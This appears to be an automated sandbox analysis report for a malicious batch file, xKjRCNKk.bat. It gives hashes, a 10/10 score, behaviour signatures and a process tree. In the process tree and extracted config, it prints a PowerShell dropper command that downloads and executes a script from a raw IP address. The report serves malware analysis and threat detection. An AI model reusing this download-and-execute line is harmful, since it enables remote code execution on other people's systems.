Analysis

  • max time kernel
    106s
  • max time network
    108s
  • platform
    windows10_x64
  • resource
    win10v200410
  • submitted
    22-04-2020 18:10

General

  • Target

    xKjRCNKk.bat

  • Size

    191B

  • MD5

    4fcc8ad649697f1f1dc32ca5b7869546

  • SHA1

    9b8655873f6850535ff1809a50c285b2a0a83a92

  • SHA256

    ffa870123e678c181157b41e18ef4d46d9e7bcc79f8bac7cf24252a119d3a9b0

  • SHA512

    7a33e722594d66080716fd63e156626a11b0d3828f7aa8ff029a5b4eb2015a1c47290a422570f6e877d441573b698411a8e5c9a0cc7386bde7395631e74959f9

Score
10/10

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://185.103.242.78/pastes/xKjRCNKk

Signatures

  • Suspicious behavior: EnumeratesProcesses 14 IoCs
  • Makes http(s) request 1 IoCs

    Contacts server via http/https, possibly for C2 communication.

  • Program crash 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\xKjRCNKk.bat"
    1⤵
      PID:4088
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/xKjRCNKk');Invoke-PKGAFUQO;Start-Sleep -s 10000"
        2⤵
          PID:3512
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 3512 -s 704
            3⤵
            • Suspicious behavior: EnumeratesProcesses
            • Program crash
            • Suspicious use of AdjustPrivilegeToken
            PID:3928

      Network

      MITRE ATT&CK Matrix

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • memory/3928-0-0x00000000045E0000-0x00000000045E1000-memory.dmp

        Filesize

        4KB

      • memory/3928-1-0x0000000004D10000-0x0000000004D11000-memory.dmp

        Filesize

        4KB